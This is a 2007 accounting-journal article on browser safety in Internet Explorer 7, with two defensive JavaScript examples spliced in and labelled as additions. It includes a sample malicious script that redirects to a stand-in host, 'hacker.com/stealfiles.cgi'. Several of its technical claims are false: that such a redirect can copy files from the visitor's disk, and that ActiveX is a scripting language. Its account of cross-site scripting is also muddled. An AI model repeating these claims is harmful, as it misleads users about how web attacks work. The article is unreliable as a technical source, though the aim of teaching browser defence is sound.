Surf safely: how to avoid Internet minefields.


The Internet is a gold mine of information, but it's also a minefield, loaded with scores of innocent-looking sites that contain stealthy programs designed to steal or destroy your data. But if you take proper precautions, you can browse the Web with relative safety.

In our illustration for ways to surf the Web, we use Microsoft's latest browser, Internet Explorer version 7, but you can apply these recommendations to other browsers as well.

GOING OR COMING?

When users surf the Web, they say they "go to" a page. In reality, though, when you type a URL (such as www.samplesite.com) or click on a link, the page actually is brought to your browser in the form of hypertext markup language (HTML)--the programming code that creates the screen image. In some cases, a malicious miniature program (written in what's called a scripting language) is hitching a ride with that HTML code. The moment that infected page reaches you, the hitchhiker executes its devilish program, which can do many nasty things, including copy your files, transmit them to the thief's computer or simply erase them. Such a script also can change your Windows system settings, leaving your computer in utter disarray.

How can a script steal information off someone's hard disk? Exhibit 1 is an example of a hypothetical script buried inside a Web page. Of course, a real script would not identify itself as coming from a dangerous hacker.
Exhibit 1

<script type="text/javascript">
<!--
// Sends the browser to the other site as soon as the page loads
window.location = "http://www.hacker.com/stealfiles.cgi";
//-->
</script>


If you were to receive this fictitious script, the hacker's program would momentarily control your computer and you would be instantly redirected to his site, www.hacker.com. Once there, a sophisticated program called stealfiles.cgi would snap into action, steal data off your hard disk, then redirect you back to the original Web page. All this could happen in just a few seconds, without your ever being aware of it.
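From the defender's side, the redirect in Exhibit 1 is easy to spot in a page's source. The following is an added example, not part of the original article: a heuristic check that lists inline scripts sending the browser to a different host than the page itself. The function name, the sample page and the same-site /login.html redirect are assumptions made for illustration.

```javascript
// Added example (not from the article): flag inline scripts that send the
// browser to a different host, the pattern shown in Exhibit 1.
// Heuristic only: it sees literal URLs, not ones built at run time.
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// window.location = "...", location.href = '...', location.replace("...")
const REDIRECT_RE =
  /\b(?:window\.|document\.)?location(?:\.href)?\s*(?:=|\.(?:replace|assign)\s*\()\s*["']([^"']+)["']/gi;

function findOffSiteRedirects(pageUrl, html) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  for (const [, body] of html.matchAll(SCRIPT_RE)) {
    for (const [, target] of body.matchAll(REDIRECT_RE)) {
      let host;
      try {
        host = new URL(target, pageUrl).hostname; // also resolves relative targets
      } catch {
        continue; // not a parseable URL, nothing to compare
      }
      if (host !== pageHost) findings.push({ target, host });
    }
  }
  return findings;
}

// Constructed sample page: one same-site redirect and the Exhibit 1 script.
const SAMPLE_PAGE_URL = "http://www.samplesite.com/index.html";
const SAMPLE_HTML = `
<html><body>
<script type="text/javascript">
if (!loggedIn) { location.href = "/login.html"; }
</script>
<script type="text/javascript">
<!--
window.location = "http://www.hacker.com/stealfiles.cgi";
//-->
</script>
</body></html>`;

console.log(findOffSiteRedirects(SAMPLE_PAGE_URL, SAMPLE_HTML));
```

Only the off-site target is reported; the redirect to /login.html stays on the same host and is ignored.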

Be assured most Web sites are safe. However, a criminal hacker will try to inject a malicious script into almost any Web site--a scenario known as cross-site scripting, or XSS. Although anti-spyware programs are designed to thwart malicious scripts, they don't always work because clever scriptwriters often stay a few steps ahead of them (see accompanying article, "Spyware Protection"). So what's the alternative? If you want total safety, you have no choice but to take matters into your own hands and disable all scripts from running on your browser. And that's easier than you think.

DO-IT-YOURSELF PROTECTION

To disable scripts, click on Tools, Internet Options, Security (see Exhibit 2). Under Select a zone to view or change security settings, click on Internet if it's not already highlighted. Then under Security level for this zone, click on Custom level.

[ILLUSTRATION OMITTED]

You now should be at a menu called Security Settings-Internet Zone (see Exhibit 3). Slide down the scrollbar to the area labeled ActiveX controls and plug-ins and click on Disable for all 10 options. ActiveX is a Microsoft scripting language.

[ILLUSTRATION OMITTED]

Then slide farther down the screen to the second section from the bottom called Scripting (see Exhibit 4) and click on Disable for all five options. This will stop any script that manages to get into your computer.

[ILLUSTRATION OMITTED]

To implement your changes, click on OK at the bottom of the panel (see Exhibit 5).

[ILLUSTRATION OMITTED]

CONSEQUENCES OF DISABLING SCRIPTING

You do pay a price for disabling scripting. For example, for those who use Yahoo e-mail, disabled scripting triggers a message asking you to either turn on JavaScript or switch back to an older version of Yahoo Mail (see Exhibit 6). But if safety is your primary concern, the cost is worth it.

[ILLUSTRATION OMITTED]

Similarly, if you use a stock ticker at a financial site, such as http://moneycentral.msn.com/investor/home.asp, you will lose the Quote watchlist box (see Exhibit 7). You can reinstate the ticker if you enable JavaScript.

[ILLUSTRATION OMITTED]

You may wish to experiment with your favorite Web pages to see whether you can tolerate the loss of functionality. Remember, you can always change your mind and re-enable scripting at any time.

You also have the option of specifying sites you know are safe and allowing scripts to run when you visit them. To do that, go back to the Security tab in Internet Options (Exhibit 2), but this time select Trusted sites. Then click on the Sites button and list those you visit and know are safe. When finished, click on OK and then adjust the security level for the Trusted sites zone just as you did for the Internet zone, but this time enable scripting.

COOKIE-CUTTING

Many Web sites acknowledge your visit by sending your computer a small text file called a cookie. Cookies do many things: They keep track of all visitors and remember what they did and looked at. While most cookies are benign, some store information you enter when you buy something at the site--your credit card number, address, phone and, in some cases, even your Social Security number and the identity of your bank account. Although some sites keep cookie information under tight security, others don't bother to encrypt cookies. If safety is a priority, you probably want to implement some kind of cookie control.

A cookie may stay permanently on your hard disk (called a persistent cookie) or just be for a single Web visit (session cookie). If you have a persistent cookie, any sensitive information on your hard disk is at risk of being stolen.

Getting rid of cookies is easy. While in your browser, click on Tools, Internet Options, General. Under the Browsing history section, click on Settings and then under Current location click View files. Now go to the Name column, right-click on the cookie you want to delete and choose Delete. You can easily identify those cookies that contain sensitive data from sites where you purchased products and entered financial information. You'll also see cookie expiration dates that are many years into the future. Unless they are truly benign, delete them.

To play it safe, however, it's best to tell your browser not to accept any persistent cookies. To do this, go to Tools, Internet Options, Privacy and click on the Advanced button. You'll see a menu that resembles Exhibit 8.

[ILLUSTRATION OMITTED]

Click on Override automatic cookie handling, and Block for First-party Cookies and Third-party Cookies. Click also on Always allow session cookies. This will allow your browser to only accept temporary session cookies while you interact with certain sites; otherwise many sites will deny you access.

When a Web site asks whether you would like to remain logged in, it actually is asking you whether you want to accept a persistent cookie. If you answer "yes," the site will send you a persistent cookie with your logon information. Always say "no."
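What separates a session cookie from a persistent one is whether the site's Set-Cookie header carries a lifetime (Expires or Max-Age). The following is an added example, not part of the original article and not Internet Explorer's own logic: it sorts headers into session, persistent and expired cookies and applies the "session cookies only" policy configured above. The header values and function names are constructed for illustration.

```javascript
// Added example (not from the article): sort Set-Cookie headers into session,
// persistent and expired cookies, then apply "allow session cookies only".
function parseSetCookie(header, now) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? "" : pair.slice(0, eq);
  let maxAge = null;
  let expires = null;
  for (const attr of attrs) {
    const i = attr.indexOf("=");
    if (i === -1) continue; // flags such as Secure carry no lifetime
    const key = attr.slice(0, i).trim().toLowerCase();
    const val = attr.slice(i + 1).trim();
    if (key === "max-age" && /^-?\d+$/.test(val)) maxAge = Number(val);
    if (key === "expires" && !Number.isNaN(Date.parse(val))) expires = new Date(val);
  }
  // Max-Age takes precedence over Expires when both are present (RFC 6265).
  if (maxAge !== null) expires = new Date(now.getTime() + maxAge * 1000);
  let kind = "session"; // no lifetime attribute: discarded when the browser closes
  if (expires !== null) kind = expires > now ? "persistent" : "expired";
  const lifetimeDays =
    kind === "persistent" ? Math.round((expires - now) / 86400000) : 0;
  return { name, kind, lifetimeDays };
}

// Policy from the article: block persistent cookies, always allow session cookies.
function applyPolicy(headers, now) {
  return headers.map((h) => {
    const c = parseSetCookie(h, now);
    return { ...c, action: c.kind === "session" ? "accept" : "block" };
  });
}

// Constructed sample headers; names and values are made up.
const NOW = new Date("2007-04-01T00:00:00Z");
const SAMPLE_HEADERS = [
  "SESSIONID=abc123; Path=/",
  "login=jsmith; Expires=Wed, 01 Apr 2037 00:00:00 GMT; Path=/",
  "prefs=compact; Max-Age=31536000; Secure",
  "old=1; Max-Age=0",
];

for (const r of applyPolicy(SAMPLE_HEADERS, NOW)) {
  console.log(`${r.name}: ${r.kind} (${r.lifetimeDays} days) -> ${r.action}`);
}
```

The "login" header is the kind a site sends after you agree to remain logged in: its expiry date lies decades ahead, so the policy refuses it.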

How much computer safety you need is a personal matter, and it depends on how much you value your data. Although there are commercial programs designed to make your workspace relatively safe, as you can see, gaps remain. The only way to be sure is to take action yourself to close the gap.

Key to Instructions

To help readers follow the instructions in this article, we use two different typefaces: Boldface type is used to identify the names of functions, menu items, agendas and URLs. Sans serif type shows the names of files and the names of commands and instructions that users should type into the computer:

James F. Leon, CPA, CISSP, is a visiting assistant professor and the director of IT training in the Department of Computer Science at Northern Illinois University, Dekalb. His e-mail address is jimleon@cs.niu.edu.
COPYRIGHT 2007 American Institute of CPA's
No portion of this article can be reproduced without the express written permission from the copyright holder.
Copyright 2007, Gale Group. All rights reserved. Gale Group is a Thomson Corporation Company.

Article Details
Author:Leon, James F.
Publication:Journal of Accountancy
Date:Apr 1, 2007
Words:1293